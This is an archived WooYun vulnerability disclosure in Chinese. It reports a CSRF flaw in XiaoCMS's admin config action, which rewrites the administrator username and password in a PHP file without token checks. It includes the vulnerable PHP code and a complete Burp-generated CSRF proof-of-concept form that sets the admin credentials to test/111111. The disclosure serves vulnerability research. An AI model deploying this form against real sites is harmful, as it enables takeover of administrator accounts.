乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-04: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-10-02: 厂商已经主动忽略漏洞,细节向公众公开
csrf
这个设计真的很难理解,修改密码的地方也可以直接修改管理员用户名,而且不是存在数据库中,而是将用户名密码存在/data/config/admin.ini.php中
public function configAction() { $admin = xiaocms::load_config('admin'); $data = $this->site_config; if ($this->post('submit')) { $postadmin = $this->post('admin'); if(empty($postadmin['admin_pass']) ) $postadmin['admin_pass'] =$admin['admin_pass']; else $postadmin['admin_pass'] = md5(md5($postadmin['admin_pass'])); $admin_arr = var_export($postadmin,true); $admin_txt = "<?php" . PHP_EOL . "if (!defined('IN_XIAOCMS')) exit();" . PHP_EOL . "return " . $admin_arr. ";"; file_put_contents(DATA_DIR . 'config' . DIRECTORY_SEPARATOR . 'admin.ini.php', $admin_txt); $configdata = $this->post('data'); $configdata['rand_code']= md5(microtime()); $config_arr = var_export($configdata,true); $config_txt = "<?php" . PHP_EOL . "if (!defined('IN_XIAOCMS')) exit();" . PHP_EOL . "return " . $config_arr. ";"; file_put_contents(DATA_DIR . 'config' . DIRECTORY_SEPARATOR . 'config.ini.php', $config_txt); $this->show_message('修改成功', 1, url('index/config', array('type'=>$this->get('type')))); } $file_list=glob(TEMPLATE_DIR.'*'); $arr= array(); foreach($file_list as $v) { if(is_dir($v)) $arr[] = basename ($v); } $theme = array_diff($arr, array('mobile')); $type = $this->get('type') ? $this->get('type') : 1; $membermodel = get_cache('member_model'); include $this->admin_tpl('config'); }
可以看到,所谓的修改密码,其实就是往配置文件中写入新的密码,同时没有做任何校验,所以用户名和密码两个参数都可以随便更改。懒得动手就直接拿burp生成的poc测试下:
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://localhost/xiaocms/admin/index.php?c=index&a=config&type=3" method="POST"> <input type="hidden" name="data[site_name]" value="XiaoCms企业建站版" /> <input type="hidden" name="data[site_theme]" value="default" /> <input type="hidden" name="data[site_mobile]" value="1" /> <input type="hidden" name="data[site_title]" value="XiaoCms演示站" /> <input type="hidden" name="data[site_keywords]" value="xiaocms" /> <input type="hidden" name="data[site_description]" value="欢迎使用xiaocms内容管理系统 官方网站:http://www.xiaocms.com" /> <input type="hidden" name="data[site_download_image]" value="1" /> <input type="hidden" name="data[admin_template]" value="1" /> <input type="hidden" name="data[admin_list_size]" value="10" /> <input type="hidden" name="data[site_status]" value="2|头条 3|推荐 0|未审核" /> <input type="hidden" name="data[site_watermark]" value="0" /> <input type="hidden" name="data[site_watermark_pos]" value="9" /> <input type="hidden" name="admin[admin_name]" value="test" /> <input type="hidden" name="admin[admin_pass]" value="111111" /> <input type="hidden" name="data[member_modelid]" value="5" /> <input type="hidden" name="data[member_register]" value="1" /> <input type="hidden" name="data[member_status]" value="1" /> <input type="hidden" name="data[member_regcode]" value="1" /> <input type="hidden" name="data[member_logincode]" value="1" /> <input type="hidden" name="data[diy_url]" value="0" /> <input type="hidden" name="data[list_url]" value="{catdir}/" /> <input type="hidden" name="data[list_page_url]" value="{catdir}/list_{page}.html" /> <input type="hidden" name="data[show_url]" value="{catdir}/{id}.html" /> <input type="hidden" name="data[show_page_url]" value="{catdir}/{id}_{page}.html" /> <input type="hidden" name="submit" value="提交" /> <input type="submit" value="Submit request" /> </form> </body></html>
用户名密码改成test,111111
xx
未能联系到厂商或者厂商积极拒绝